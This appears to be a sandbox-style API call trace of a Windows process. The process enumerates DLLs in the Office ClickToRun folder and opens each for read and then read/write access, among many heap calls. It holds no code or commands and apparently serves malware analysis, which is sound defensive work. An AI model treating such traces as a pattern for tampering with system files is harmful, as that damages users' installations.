HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0074.516] AreFileApisANSI () returned 1 [0074.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0074.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0074.516] AreFileApisANSI () returned 1 [0074.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 92 [0074.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.517] GetFileType (hFile=0x42c) returned 0x1 [0074.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.517] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.517] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.517] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.517] CloseHandle (hObject=0x42c) returned 1 [0074.518] AreFileApisANSI () returned 1 [0074.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 92 [0074.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.518] GetFileType (hFile=0x42c) returned 0x1 [0074.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.518] CloseHandle (hObject=0x42c) returned 1 [0074.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0074.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0074.520] AreFileApisANSI () returned 1 [0074.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 92 [0074.520] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0)) returned 1 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0074.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.520] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5ac0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="AP8F34~1.DLL")) returned 1 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0074.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0074.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0074.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0074.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0074.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.521] AreFileApisANSI () returned 1 [0074.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0074.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0074.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0074.521] AreFileApisANSI () returned 1 [0074.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 92 [0074.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.522] GetFileType (hFile=0x42c) returned 0x1 [0074.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.522] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.523] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.523] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.523] CloseHandle (hObject=0x42c) returned 1 [0074.523] AreFileApisANSI () returned 1 [0074.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 92 [0074.523] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.523] GetFileType (hFile=0x42c) returned 0x1 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.524] CloseHandle (hObject=0x42c) returned 1 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0074.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0074.525] 